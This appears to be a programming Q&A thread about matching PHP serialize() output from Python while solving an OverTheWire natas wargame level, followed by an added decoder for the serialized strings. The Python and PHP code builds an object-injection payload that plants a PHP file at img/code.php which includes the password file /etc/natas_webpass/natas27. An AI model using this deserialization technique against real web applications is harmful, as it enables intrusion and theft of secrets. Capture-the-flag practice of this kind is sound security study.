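Unexpected behavior of PHP serialization in Python

While working on an online natas challenge, I wanted to convert PHP code to Python, but I did not get the expected result. Maybe I am missing something in phpserialize.

Why does it give a different output?

Python code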

import base64
from phpserialize import serialize

payload = {'initMsg': "", 'exitMsg': "<?php include('/etc/natas_webpass/natas27');?>", 'logFile': "img/code.php"}
# base64.encodestring was removed in Python 3.9; encodebytes is the same function
new_ser = base64.encodebytes(serialize(payload))
print(new_ser)

PHP code

<?php
class Logger {
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct() {
        $this->initMsg = "";
        $this->exitMsg = "<?php include('/etc/natas_webpass/natas27');?>";
        $this->logFile = "img/code.php";
    }
}
$obj = new Logger();
echo base64_encode(serialize($obj));
?>

The PHP code produces: Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=

The Python code produces:

b'YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1\nZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoi\naW1nL2NvZGUucGhwIjt9\n'

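You serialize a hash in the Python version and an object in the PHP version. Just convert the object to a hash (associative array) and you will get the same result: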

<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>

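After looking at the documentation, I came up with a solution that first converts the data into an object and then serializes it.

@Maxim made the PHP code behave like the Python code;

the code below makes the Python code behave like the PHP code.

This feels like the hard way; I am not sure whether it can be made simpler.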

import base64
from phpserialize import serialize, phpobject

class Logger:
    def __init__(self, initMsg, exitMsg, logFile):
        self.initMsg = initMsg
        self.exitMsg = exitMsg
        self.logFile = logFile

def object_hook(obj):
    # Private PHP properties are serialized under the name "\0<class>\0<property>"
    if isinstance(obj, Logger):
        return phpobject('Logger', {b'\x00Logger\x00initMsg': obj.initMsg, b'\x00Logger\x00exitMsg': obj.exitMsg, b'\x00Logger\x00logFile': obj.logFile})

logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")
# base64.encodestring was removed in Python 3.9; encodebytes is the same function
new_ser = base64.encodebytes(serialize(logger, object_hook=object_hook)).replace(b'\n', b'').decode('ascii')
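
Added example, not part of the original question or answers: a standard-library-only decoder for the subset of PHP's serialize() format that appears on this page (strings, arrays and objects), run over the two base64 outputs quoted in the question. It shows that the PHP output is an "O:" object of class Logger whose private properties are stored under "\0Logger\0name" keys, while the Python output is a plain "a:" array; the names parse, visibility and describe are this example's own.

```python
import base64

PHP_OUTPUT = (  # quoted in the question
    "Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhw"
    "IjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6"
    "NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=")
PYTHON_OUTPUT = (  # quoted in the question, newlines dropped
    "YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1"
    "ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoi"
    "aW1nL2NvZGUucGhwIjt9")

def parse(buf, pos=0):
    """Parse one value (string, array or object only); return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag == b's':                                  # s:<len>:"<bytes>";
        colon = buf.index(b':', pos + 2)
        end = colon + 2 + int(buf[pos + 2:colon])
        return buf[colon + 2:end], end + 2           # skip the closing ";
    if tag in (b'a', b'O'):
        cls, pos = None, pos + 2
        if tag == b'O':                              # O:<len>:"<class>":<n>:{...}
            colon = buf.index(b':', pos)
            end = colon + 2 + int(buf[pos:colon])
            cls, pos = buf[colon + 2:end].decode(), end + 2
        colon = buf.index(b':', pos)                 # a:<n>:{...}
        count, pos = int(buf[pos:colon]), colon + 2
        items = {}
        for _ in range(count):
            key, pos = parse(buf, pos)
            items[key], pos = parse(buf, pos)
        return (cls, items), pos + 1                 # skip the closing }
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

def visibility(key):
    """Split a serialized property name into (visibility, bare name)."""
    if key.startswith(b'\x00'):                      # \0Class\0name or \0*\0name
        _, owner, name = key.split(b'\x00', 2)
        return ('protected' if owner == b'*' else 'private'), name.decode()
    return 'public', key.decode()

def describe(b64):  # -> (kind, class name, keys or (visibility, property) pairs)
    value, _ = parse(base64.b64decode(b64))
    if isinstance(value, bytes):
        return 'string', None, []
    cls, items = value
    if cls is None:
        return 'array', None, [k.decode() for k in items]
    return 'object', cls, [visibility(k) for k in items]

print(describe(PHP_OUTPUT), describe(PYTHON_OUTPUT), sep="\n")
```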